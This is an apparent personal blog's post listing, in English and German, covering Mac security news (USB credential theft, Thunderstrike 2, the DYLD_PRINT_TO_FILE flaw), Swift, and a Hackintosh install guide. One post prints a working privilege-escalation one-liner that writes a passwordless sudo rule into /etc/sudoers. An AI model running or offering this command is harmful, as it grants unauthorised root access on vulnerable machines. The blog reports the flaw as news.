Sep 16 08

passwdSecurity researcher Robert Fuller discovered an attack method with which Windows and Mac user credentials can be stolen from a locked machine.
This attack is affected against actual Windows and Mac OS computers on which the user has already logged in.

The researcher used USB-based Ethernet dongles like USB Armory or Hak5 Turtle , for which he modified the firmware code to run special software that sets the plug-and-play USB device as the network gateway, DNS, and WPAD servers on the computer it’s connected to.
Find out more:

written by d45id \\ tags: , , , , , ,

Aug 15 04

DYLD_PRINT_TO_FILEOh no, only a couple of days after OS X  a privilege escalation vulnerability in OS X 10.10 was discovered a researcher at Malwarebytes spot a new adware installer that uses DYLD_PRINT_TO_FILE exploit.

What you can do?

  • wait until Apple released a security update while you get p0wned
  • install SUIDGuard – A kernel extension adding mitigations to protect SUID/SGID binaries

written by d45id \\ tags: , , , , ,

Aug 15 03

Kovah, who discovered with his partners a lot of firmware vulnerabilities in Macs  last year has now designed with Trammell Hudson, a security engineer a worm they dubbed Thunderstrike 2 that can spread between MacBooks undetected.

[The attack is] really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware

Find out more at BlackHat & DefCon or read an amazing article @wired

written by d45id \\ tags: , , , , , , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,

Jun 14 06

flappyswiftNich einmal ganz 24 Stunden nachdem Apple die Programmiersprache Swift vorstellte veröffentlichten die beiden Programmierer Ari Lerner und Nate Murray ihren in Swift geschriebenen Flappy Bird-Clone auf Github.

Bis Swift Programme einzug in den AppeStore erhalten wird es wohl noch bis zum offiziellen Release von iOS 8 und OS X Yosemite dauern, aber bis dahin zeigt sich aber schon welches Potenzial Swift mit sich bringt und wie vergleichbar einfach der Einstieg ist.

written by d45id \\ tags: , , , ,

Jun 14 03

Apple-swift-logoGestern stellte Apple auf ihrer Entwicklerkonferenz WWDC 2014 ihre neu entwickelte Programmiersprache Swift vor.

Bei Swift handelt es sich um eine objektorientierte Sprache und befördert Objectiv-C nun endlich auf das Abstellgleis. Apple hat sich bei der Umsetzung Mühe gegeben und viele nette Konzepte moderner Programmiersprachen wie Klassen, Vererbung, Closures, Typinferenz, Generische Typen, Namensräume und multiple Rückgabewerte umgesetzt.

Eine Beta-Version von Swift kann über das  iOS- und OS X-Developer-Programmes bezogen werden. Eine  Dokumentation steht im iBook-Store zum kostenlosen Download bereit.

written by d45id \\ tags: , , ,

Jan 11 16

Ich wurde neulich drauf angesprochen, ob es denn möglich sei die Installations DVD von Mac OS X 10.6. Snow Leopard auf eine externe Festplatte bzw. eine USB-Sticke zu packen ob es von diesen aus zu installieren.
Ja es geht und das sogar ziemlich einfach mit Carbon Copy Cloner ;-)
Empfehlenswert für jede Person, die über kein funktionstüchtiges DVD-Laufwerk mehr verfügt bzw. gar keines besitzt (vgl. Mac Book AIR).

Dazu erstellte ich mir erst einmal eine ISO aus meiner DVD und mountete dieses. Ich startete den Carbon Copy Cloner und wählte nun aus, dass ich dieses Objekt auf eine Partition meiner externen Festplatte kopieren wollte. Der Carbon Copy Cloner erkannte die Startfähigkeit des Mediums und bestätigte auch gleich die Bootfähigkeit meiner Festplatte (wichtig ist hier, dass das Partionstabllen-Schema GUID ist).Durch die Bootfähigkeit der externen Festplatte lässt sich somit von dieser booten und das System installieren.

written by d45id \\ tags: , , , ,

Jun 09 22

What you need to install OSX 10.5.2:

  • external DVD drive
  • DVD containing Kalyway 10.5.2 install (look for that on the usual sites ;)
  • My Wind driver and utility pack
  • a proper licend copy of Leopard

At first ensure you’ve installed BIOS version of at least 1.05
You can find updates for your MSI machine here

Step by Step tutorial guid

  1. Insert the Kalyway 10.5.2 disk into your external DVD drive, and plug it into your Wind
  2. Start your Wind, and press F11 when prompted to choose a boot device. When the blue list pops up, select your DVD drive
  3. When prompted to hit a key to boot from CD/DVD, hit a key…. you’ll see a ton of text scroll up the screen – just sit tight
  4. You’ll next be presented with your language select screen. I imagine you want English, so just hit enter! It’ll then sit doing ‚Preparing Installation‘ for a while.
  5. When you get the ‚Welcome‘ screen, don’t hit continue straight away! Move your point to the ‚Utilities‘ menu, and select ‚Disk Utility‘.
  6. When the Disk Utility application has loaded, click your main drive in the left hand pane
  7. Click ‚Partition‘ on the right hand pane.
  8. Under ‚Volume Scheme‘, click ‚1 partition‘.
  9. Give your disk a nice name. I chose ‚Leopard‘. Original, I know!
  10. Click ‚Apply‘
  11. Wait for it to do it’s thing, then select ‚Quit Disk Utility‘ from the ‚Disk Utility‘ menu.
  12. You’ll now be taken back to the installer welcome page. Click ‚Continue‘.
  13. Click ‚Agree‘ when the legalese blurb pops up.
  14. Choose a destination drive – obviously the one you just partitioned! Click ‚Continue‘.
  15. Click ‚Customize‘.
  16. Completely uncheck ‚Language Translations‘.
  17. Expand ‚Kernels‘ and select ONLY ‚kernel_vanilla_92‘
  18. Expand ‚Graphics_Drivers‘, expand ‚Intel_GMA‘ and select ONLY ‚GMA950‘
  19. Completely uncheck ‚Audio_Drivers‚.
  20. Expand ‚Networks_Drivers‘. and select ONLY ‚RTL1000‘.
  21. Completely uncheck ‚Mobo_Chipsets‘.
  22. Completely uncheck ‚Thirds_Applications‘.
  23. Expand ‚Patches‘ and select ‚TimeMachineFix‘ and ‚PowerManagement_bundle‘.
  24. Click ‚Done‘
  25. Click ‚Install‘ and go and make yourself a cup of coffee!
  26. The install will now take place, if you want to speed it up, you can ‚Skip‘ the installation DVD check.
  27. Remember: the Time Remaining calculation, it’s not really that accurate. In particular, the ‚Time Remaining: About a minute‘ is pretty optimistic
  28. When the ‚Install Succeeded‘ screen appears, eject the install DVD and hit ‚Restart‘.
  29. OS will now start up for the first time, and take you through the setup wizard.
  30. OSX 10.5.2 is now running on your MSI Wind

Install MSI Wind driver and utility pack

  1. When you have booted into OSX, insert the disk containing my Wind driver and utility pack.
  2. Select the ‚utilities‘ directory in my pack.
  3. Drag ‚kext helper b7‘ somewhere helpful. Your ‚Applications‘ folder for example.
  4. MAKING CPU SHOW U CORRECTLY IN ABOUT THIS MAC: Double click ‚AboutThisMac‘ in the ‚utilities‘ directory and step through the installation process.
  5. ENABLING SOUND: Change to the ’sound‘ directory and double click ‚AzaliaAudio.pkg‘ and step through the installation process. Do NOT hit restart when prompted!
  6. GRAPHICS, BATTERY ICON, ABOUT THIS MAC FIXES / MACHINE TYPE COMPATABILITY, ETHERNET AND SLEEP ON LID CLOSED: Change to the ‚kexts‘ directory. Run kexthelper, and drag all of the .kext files in this directory to it’s window. Switch to the kexthelper window, input your password, then click ‚Easy Install‘.
  7. Reboot!
  8. Run ‚System Preferences‘ -> ‚Energy Saver‘ and select ‚Show Details‘. Select ‚Options‘ and then ‚Show battery status in menu bar‘.
  9. FIXING KEYBOARD MAP (UK keyboard layouts only): Change to the ‚kaylayout‘ directory on my Wind driver and utility pack, and copy ‚Advent 4211.keylayout‘ to ‚\Library\Keyboard Layouts‘. Run ‚System Preferences‘ -> ‚International‘, and click ‚Input Menu‘. SCroll down the list until you see ‚Advent 4211‘. Click the checkbox, and you will see a flag appear in your menu bar. Click this to select the Advent layout.
  10. Almost done!

written by d45id \\ tags: , , ,